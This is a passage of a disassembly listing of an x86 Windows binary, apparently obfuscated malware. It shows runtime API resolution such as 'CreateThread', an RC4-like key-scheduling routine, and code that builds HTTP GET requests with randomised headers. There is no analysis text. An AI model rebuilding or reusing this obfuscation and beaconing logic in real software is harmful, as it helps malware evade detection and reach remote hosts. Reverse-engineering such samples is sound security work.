jz loc_9B23EF
jmp off_9B9E97
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B48CC: ; CODE XREF: sub_9B1A08-845�j
; DATA XREF: .text:off_9B8F8D�o
push 0
mov ecx, [ebp+var_41E4]
push ecx
push 10h
pop eax
call sub_9AC32C
mov [ebp+var_4200], eax
test al, 1
jnz loc_9B2C5C
jmp off_9BAF63
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
mov esi, [ebp-1Ch]
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9B4901: ; CODE XREF: sub_9B2830-5694�j
; sub_9B2830+1D76�j
mov ecx, [ebp-10h]
mov eax, esi
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABE84
loc_9B4918: ; CODE XREF: sub_9ABE84+65�j
; DATA XREF: .text:off_9B8D96�o
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push 80h
push esi
pop eax
push eax
call dword ptr [edx+4Ch]
mov ecx, dword_9BCB74
mov eax, esi
push dword ptr [ecx]
pop edx
push eax
call dword ptr [edx+44h]
jmp loc_9B12BB
; END OF FUNCTION CHUNK FOR sub_9ABE84
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AE400
loc_9B4944: ; CODE XREF: sub_9AE400+3F�j
mov [ebp+var_1C], 1
jmp loc_9B43AB
; END OF FUNCTION CHUNK FOR sub_9AE400
; =============== S U B R O U T I N E =======================================
sub_9B4950 proc near ; DATA XREF: .text:off_9B946E�o
; FUNCTION CHUNK AT 009AB068 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AB2E8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009ABB14 SIZE 0000003C BYTES
; FUNCTION CHUNK AT 009AC0B0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AD3C4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009ADB98 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009AEF08 SIZE 00000044 BYTES
; FUNCTION CHUNK AT 009AFE14 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009AFF4C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B0D64 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B194C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B20B4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B2778 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B2944 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009B2A4C SIZE 00000065 BYTES
; FUNCTION CHUNK AT 009B3128 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B32C4 SIZE 00000070 BYTES
; FUNCTION CHUNK AT 009B366C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B36AC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B3A04 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B3BC8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B42AC SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009B457C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B47B0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B50D0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B5BFC SIZE 0000004A BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B9481
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 3Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
sub ebx, ebx
mov [ebp-4], ebx
call sub_9B6504
push ebx
push ebx
push off_9B909D
call sub_9ABF08
mov [ebp-28h], eax
push ebx
push 1
push off_9B8820
call sub_9ABF08
mov [ebp-2Ch], eax
push ebx
push 1
push off_9BA7C1
call sub_9ABF08
mov [ebp-30h], eax
push ebx
push ebx
push off_9B8820
call sub_9ABF08
mov [ebp-34h], eax
push ebx
push ebx
push off_9BA7C1
call sub_9ABF08
mov [ebp-38h], eax
call sub_9B46CC
mov [ebp-20h], eax
loc_9B49DE: ; CODE XREF: sub_9B4950-9657�j
push dword ptr [ebp+8]
pop eax
push eax
mov edx, 1388h
call sub_9B5CDC
test eax, eax
jnz loc_9ABB14
jmp off_9B8941
sub_9B4950 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3B1C
loc_9B49FC: ; CODE XREF: sub_9B3B1C+56�j
call sub_9B45AC
mov dword_9BCBB4, eax
call sub_9B45AC
mov dword_9BCBB8, eax
call sub_9B45AC
mov dword_9BCBBC, eax
call sub_9B45AC
mov dword_9BCBC0, eax
call sub_9B45AC
mov dword_9BCBC4, eax
call sub_9B45AC
mov dword_9BCBC8, eax
push 1
push 18h
pop ecx
mov edx, offset dword_9BCBB4
call sub_9B1B20
jmp off_9B99EA
; END OF FUNCTION CHUNK FOR sub_9B3B1C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B4A50: ; CODE XREF: sub_9AB1A0+2171�j
; DATA XREF: .text:off_9B8C85�o
push dword ptr [ebp+10h]
pop eax
mov edx, [eax]
push dword ptr [ebp+8]
pop ecx
mov [ecx+edx*4], edi
inc dword ptr [eax]
jmp loc_9B5F54
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B4A64: ; CODE XREF: sub_9B1F68+2159�j
; DATA XREF: .text:off_9B9A29�o
push dword ptr [ebp-3Ch]
pop eax
or eax, eax
jnz loc_9B276B
jmp loc_9B274C
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B4A80: ; CODE XREF: sub_9B63D8-51B4�j
; DATA XREF: .text:off_9BB025�o
cmp [eax], ebx
jz loc_9AF944
jmp loc_9B13A8
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AE860
loc_9B4A90: ; CODE XREF: sub_9AE860+71C0�j
; DATA XREF: .text:off_9BADA8�o
mov edi, eax
sub ecx, esi
mov edx, ecx
dec edi
loc_9B4A97: ; CODE XREF: sub_9AE860+623D�j
mov cl, [edi+1]
inc edi
or cl, cl
jnz short loc_9B4A97
jmp loc_9B0F18
; END OF FUNCTION CHUNK FOR sub_9AE860
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9B4AA4: ; CODE XREF: sub_9B5904-1108�j
; DATA XREF: .text:off_9BA83C�o
lea eax, [ecx+ecx*4]
shl eax, 3
cmp dword_9BEC2C[eax], ebx
jnz loc_9AB198
jmp off_9B9384
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4610
loc_9B4ABC: ; CODE XREF: sub_9B4610-3B3C�j
; DATA XREF: .text:off_9B956C�o
and ebx, ebx
jnz loc_9AF228
jmp loc_9AE4EC
; END OF FUNCTION CHUNK FOR sub_9B4610
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B4ACC: ; CODE XREF: sub_9B3864-5595�j
; DATA XREF: .text:off_9B9342�o
push [ebp+var_2028]
pop edx
test edx, edx
jnz loc_9AEB8C
jmp off_9B9E9B
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B4AE4: ; CODE XREF: sub_9AF030+24FB�j
call sub_9B2160
mov edi, eax
mov [ebp+var_1C], edi
test edi, edi
jz loc_9AC62B
jmp loc_9B5140
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B4AFC: ; CODE XREF: sub_9AB1A0+AAD7�j
; DATA XREF: .text:off_9B99DC�o
mov ecx, dword_9BCBC8[eax*4]
test ecx, ecx
jnz loc_9B5894
jmp loc_9B5B88
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
loc_9B4B10: ; CODE XREF: .text:009B20A5�j
xor eax, eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B4B18: ; CODE XREF: sub_9B0930-10E8�j
; DATA XREF: .text:off_9BA7E1�o
push off_9BAD44
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop ecx
mov [ecx+40h], eax
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
mov ecx, [eax+40h]
test ecx, ecx
jz loc_9B23EF
jmp loc_9B1C5C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9B4B4C: ; CODE XREF: sub_9B2830+1026�j
or edi, edi
jz loc_9AD195
jmp off_9B9641
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B19D8
loc_9B4B5C: ; CODE XREF: sub_9B19D8-3A66�j
; DATA XREF: .text:off_9B920B�o
push 0
lea edx, [ebp-4048h]
push edx
lea ecx, [ebp-4022h]
push ecx
push esi
push 6
push dword ptr [ebp-4050h]
pop edx
push edx
lea ecx, [ebp-4034h]
push ecx
add eax, 0FFFFFFFEh
push eax
lea ecx, [ebp-4044h]
lea edx, [ebp-201Eh]
call sub_9B1D80
push dword ptr [ebp-4048h]
pop edi
or edi, edi
jz loc_9B5E0C
jmp loc_9B349C
; END OF FUNCTION CHUNK FOR sub_9B19D8
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B57B4
loc_9B4BAB: ; CODE XREF: sub_9B57B4-11AD�j
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B57B4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B4BD0: ; CODE XREF: sub_9B0930+4757�j
; DATA XREF: .text:off_9BAFC3�o
push off_9B8C20
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx]
pop ecx
mov [ecx+18h], eax
push dword_9BCB74
pop edx
mov eax, [edx]
jmp off_9BAB90
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B4BF8 proc near ; CODE XREF: sub_9ABC20+9EAA�j
; FUNCTION CHUNK AT 009ADBD4 SIZE 00000025 BYTES
push ebx
pop eax
lea edx, [eax+1]
loc_9B4BFD: ; CODE XREF: sub_9B4BF8+A�j
mov cl, [eax]
inc eax
and cl, cl
jnz short loc_9B4BFD
jmp loc_9ADBD4
sub_9B4BF8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B4C0C: ; CODE XREF: sub_9B0930+160�j
push off_9B9E93
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
mov [edx+3Ch], eax
mov eax, dword_9BCB74
push dword ptr [eax]
pop eax
mov ecx, [eax+3Ch]
and ecx, ecx
jz loc_9B23EF
jmp loc_9AF6D0
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B4C3C: ; CODE XREF: sub_9B1A08-3D5F�j
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
push eax
call dword ptr [edx+38h]
loc_9B4C4A: ; CODE XREF: sub_9B1A08-3D65�j
; sub_9B1A08-3C73�j
sub esi, esi
mov [ebp+var_41E8], esi
mov edi, [ebp+var_41E0]
loc_9B4C58: ; CODE XREF: sub_9B1A08-614C�j
cmp esi, edi
jnb loc_9B1C13
jmp off_9B8DA6
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B4C68: ; CODE XREF: sub_9B1A08-3C82�j
; DATA XREF: .text:off_9B99F2�o
mov ecx, [ebp+var_4208]
push ecx
lea ecx, [ebp+var_403C]
lea edx, [ebp+var_401C]
call sub_9B1D80
mov edi, [ebp+var_41F8]
test edi, edi
jz loc_9AD484
jmp loc_9AE954
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3D1C
loc_9B4C94: ; CODE XREF: sub_9B3D1C+47�j
; DATA XREF: .text:off_9BA443�o
lea esi, [ebx+4]
push 10h
pop ecx
lea edi, [eax+4]
rep movsd
mov esi, [ebx+44h]
or esi, esi
jz loc_9B17F8
jmp off_9BA0B9
; END OF FUNCTION CHUNK FOR sub_9B3D1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B4CB0: ; CODE XREF: sub_9ADAC4+83A2�j
push 5
push ebx
mov eax, 8
call sub_9AC32C
mov [ebp-58h], eax
test al, 1
jnz loc_9ADCDC
jmp off_9BA15C
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-1Ch]
pop eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B4CF0: ; CODE XREF: .text:009AB514�j
; DATA XREF: .text:off_9BA0D4�o
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B4CF4 proc near ; CODE XREF: sub_9B29B0+4B�p
; sub_9B3BE8+3�p
; FUNCTION CHUNK AT 009AFEC0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B0DC8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B0E00 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009B2558 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009B2CCC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B5454 SIZE 00000013 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA7A8
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
mov ebx, [ebp+0Ch]
mov byte ptr [ebx], 0
mov ecx, [ebp+8]
test cl, 1
jz loc_9B256C
jmp loc_9B2CCC
sub_9B4CF4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B4D3C: ; CODE XREF: sub_9B0930+38B9�j
mov dword ptr [ebp-20h], 1
jmp loc_9B23EF
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0734
loc_9B4D48: ; CODE XREF: sub_9B0734+3B0F�j
mov [ebx], eax
mov eax, 4
loc_9B4D4F: ; CODE XREF: sub_9B0734+18�j
pop esi
pop ecx
retn 8
; END OF FUNCTION CHUNK FOR sub_9B0734
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B4D58: ; CODE XREF: sub_9AB1A0+ADC5�j
; DATA XREF: .text:off_9B9E87�o
call sub_9B45AC
sub edx, edx
div dword ptr [ebp-24h]
mov [ebp-20h], edx
sub edi, edi
mov [ebp-1Ch], edi
xor ebx, ebx
loc_9B4D6C: ; CODE XREF: sub_9AB1A0+B8A�j
mov [ebp-28h], ebx
cmp ebx, 20h
jnb loc_9B2911
jmp loc_9AE134
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B4D80: ; CODE XREF: sub_9AC6DC-2EF�j
; DATA XREF: .text:off_9B91CC�o
ja loc_9B30B0
jmp loc_9B35E8
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B4D8C: ; CODE XREF: sub_9B4FD0-6300�j
inc eax
jmp loc_9AD321
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B4D94: ; CODE XREF: sub_9B63D8-583�j
; DATA XREF: .text:off_9BA615�o
movsx eax, al
lea eax, [eax+eax*4]
movsx edx, dl
movsx ecx, cl
lea eax, [edx+eax*2]
lea eax, [eax+eax*4]
cmp ebx, 33h
lea edx, [ecx+eax*2-14D0h]
mov eax, [ebp-2158h]
mov [eax], edx
jl loc_9B41AB
jmp loc_9AB610
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6A0
loc_9B4DC4: ; CODE XREF: sub_9AC6A0+87EB�j
mov eax, [esp+1Ch+var_C]
loc_9B4DC8: ; CODE XREF: sub_9AC6A0+36�j
add eax, ecx
mov dl, [ecx]
mov [esp+1Ch+var_11], dl
cdq
idiv edi
mov al, [ebp+edx+0]
add al, [esp+1Ch+var_11]
add bl, al
movzx edx, bl
lea eax, [esi+edx+2]
mov dl, [eax]
mov [ecx], dl
mov dl, [esp+1Ch+var_11]
mov [eax], dl
mov al, [ecx+1]
push [esp+1Ch+var_8]
pop edx
mov [esp+1Ch+var_11], al
lea eax, [ecx+edx]
cdq
idiv edi
mov al, [ebp+edx+0]
add al, [esp+1Ch+var_11]
add bl, al
movzx edx, bl
lea eax, [esi+edx+2]
mov dl, [eax]
mov [ecx+1], dl
mov dl, [esp+1Ch+var_11]
mov [eax], dl
mov al, [ecx+2]
mov [esp+1Ch+var_11], al
push [esp+1Ch+var_10]
pop eax
cdq
idiv edi
mov al, [esp+1Ch+var_11]
mov dl, [ebp+edx+0]
add dl, al
add bl, dl
movzx eax, bl
mov dl, [esi+eax+2]
lea eax, [esi+eax+2]
mov [ecx+2], dl
mov dl, [esp+1Ch+var_11]
mov [eax], dl
mov al, [ecx+3]
mov edx, [esp+1Ch+var_4]
mov [esp+1Ch+var_11], al
lea eax, [ecx+edx]
cdq
idiv edi
mov al, [ebp+edx+0]
add ecx, 4
add al, [esp+1Ch+var_11]
add bl, al
movzx edx, bl
lea eax, [esi+edx+2]
mov dl, [eax]
mov [ecx-1], dl
mov dl, [esp+1Ch+var_11]
mov [eax], dl
add [esp+1Ch+var_10], 4
mov eax, [esp+1Ch+var_C]
add eax, ecx
cmp eax, 100h
jl loc_9B4DC4
jmp off_9B93DF
; END OF FUNCTION CHUNK FOR sub_9AC6A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B4E98: ; CODE XREF: sub_9B1D80-6D96�j
; DATA XREF: .text:off_9BA3A0�o
and edx, edx
jz loc_9B3ECB
jmp loc_9B04DC
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B4EA8: ; CODE XREF: sub_9B63D8-45B0�j
; DATA XREF: .text:off_9BA374�o
add eax, ecx
cmp ebx, eax
jnz loc_9ABE10
jmp off_9BAAFD
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B4EB8: ; CODE XREF: sub_9ADAC4+784�j
; sub_9ADAC4+681E�j ...
and ebx, ebx
jz loc_9AB8EE
jmp off_9B970B
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B4EC8: ; CODE XREF: sub_9B63D8-AE72�j
; sub_9B63D8-807�j
lea ebx, [ebp-120h]
call sub_9AB3B0
loc_9B4ED3: ; CODE XREF: sub_9B63D8-93C1�j
push edi
lea eax, [ebp-120h]
push eax
call sub_9B45AC
mov ecx, 3
xor edx, edx
div ecx
push off_9BB03C[edx*4]
pop edx
push edx
call sub_9B45AC
xor edx, edx
push 0Ah
pop ecx
div ecx
push off_9BA48C[edx*4]
pop edx
push edx
call sub_9B45AC
and eax, 3
mov eax, off_9B8D00[eax*4]
push eax
call sub_9B45AC
mov ecx, 3
xor edx, edx
div ecx
push off_9B88F0[edx*4]
pop edx
push edx
call sub_9B45AC
push 3
pop ecx
xor edx, edx
div ecx
push off_9BA358[edx*4]
pop edx
push edx
call sub_9B45AC
xor edx, edx
mov ecx, 3
div ecx
push off_9B99D0[edx*4]
pop edx
push edx
call sub_9B45AC
push 3
pop ecx
xor edx, edx
div ecx
push off_9B9058[edx*4]
pop edx
push edx
call sub_9B45AC
xor edx, edx
mov ecx, 3
div ecx
mov edx, off_9B9670[edx*4]
push edx
push dword ptr [ebp-2160h]
pop eax
push eax
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push 1FFFh ; Count
lea ecx, [ebp-2120h]
push ecx ; Dest
call _snprintf
add esp, 38h
lea eax, [ebp-2120h]
lea edx, [eax+1]
loc_9B4FB0: ; CODE XREF: sub_9B63D8-1423�j
mov cl, [eax]
inc eax
and cl, cl
jnz short loc_9B4FB0
jmp loc_9B3788
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
push edi
mov ecx, 93h
xor eax, eax
mov edi, off_9B9FDF
rep stosd
pop edi
retn
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9B4FD0 proc near ; CODE XREF: sub_9B1D80-32EE�p
; sub_9B3864-37EC�p
; FUNCTION CHUNK AT 009AAEF0 SIZE 0000008A BYTES
; FUNCTION CHUNK AT 009AB8C4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009ACB48 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009ACC18 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009AD318 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009AECC4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AED84 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AF184 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AFB08 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AFDAC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AFED8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B0A98 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B0D54 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B0E4C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B104C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B1E44 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B30E0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 009B3A50 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B3C54 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B4D8C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B54D0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B5708 SIZE 00000017 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B99BD
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 220h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
mov [ebp-18h], esp
mov [ebp-228h], ebx
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push off_9BA623
call dword ptr [ecx+18h]
xor esi, esi
mov [ebp-4], esi
cmp [ebp+8], esi
jz loc_9B104C
jmp loc_9AF184
sub_9B4FD0 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9B5034: ; CODE XREF: sub_9AC32C:loc_9B5E20�j
test esi, esi
push [esp+324h+arg_0]
pop esi
jz loc_9B4127
jmp loc_9AD280
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9B504C: ; CODE XREF: sub_9B037C-49BD�j
; sub_9B2E04-9EE�j ...
and edi, edi
jz loc_9AC13B
jmp off_9B9CEC
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B505C: ; CODE XREF: sub_9B0930+F87�j
push offset aCreatethread ; "CreateThread"
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
mov [edx+14h], eax
push dword_9BCB74
pop eax
push dword ptr [eax]
pop eax
mov ecx, [eax+14h]
or ecx, ecx
jz loc_9B23EF
jmp off_9BAFC3
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B5090: ; CODE XREF: sub_9AC6DC+3984�j
mov dword_9BBD24, 0FFFFFFFFh
jmp loc_9AF003
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B50A0: ; CODE XREF: sub_9B0930+3F93�j
; DATA XREF: .text:off_9B9E97�o
push off_9BA0F5
push dword ptr [eax]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx]
mov [edx+24h], eax
push dword_9BCB74
pop eax
mov eax, [eax]
mov ecx, [eax+24h]
test ecx, ecx
jz loc_9B23EF
jmp loc_9AD55C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B50D0: ; CODE XREF: sub_9B4950-49F2�j
; DATA XREF: .text:off_9B8F9A�o
cmp dword_9BEC20[edi], ebx
jz loc_9B332E
jmp loc_9B366C
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABA3C
loc_9B50EC: ; CODE XREF: sub_9ABA3C+A2E1�j
or eax, eax
jz loc_9B0296
jmp off_9BADF4
; END OF FUNCTION CHUNK FOR sub_9ABA3C
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B5100 proc near ; CODE XREF: sub_9B4BF8-701E�p
; sub_9B57B4-11B5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 009AB6B4 SIZE 00000015 BYTES
push esi
push eax
pop esi
push edi
xor eax, eax
mov edi, esi
push 40h
pop ecx
rep stosd
stosw
xor eax, eax
loc_9B5111: ; CODE XREF: sub_9B5100+1B�j
mov [eax+esi+2], al
inc eax
cmp eax, 100h
jl short loc_9B5111
jmp loc_9AB6B4
sub_9B5100 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B5124: ; CODE XREF: sub_9B649C-81F7�j
; DATA XREF: .text:off_9B9D04�o
add eax, 1Ah
mov [ebp+var_1C], eax
loc_9B512A: ; CODE XREF: sub_9B649C-81FD�j
test bh, 7Fh
jz loc_9AE5F0
jmp loc_9B0D18
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B5140: ; CODE XREF: sub_9AF030+5AC6�j
mov ecx, dword_9BCB74
mov edx, [ecx]
push 0
push 0
push 0
mov eax, dword_9BBF9C[esi]
push eax
call dword ptr [edx+78h]
mov ecx, dword_9BCB74
mov edx, [ecx]
push 0
lea eax, [ebp+var_28]
push eax
mov ecx, [edi]
push ecx
push dword ptr [edi+44h]
pop eax
push eax
mov ecx, dword_9BBF9C[esi]
push ecx
call dword ptr [edx+74h]
or eax, eax
jz loc_9AC620
jmp off_9B8ECE
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B5188: ; CODE XREF: sub_9B04A8+11�j
; DATA XREF: .text:off_9B942D�o
sub ebx, ebx
mov [ebp-404Ch], ebx
mov [ebp-4040h], ebx
loc_9B5196: ; CODE XREF: sub_9B04A8+58CE�j
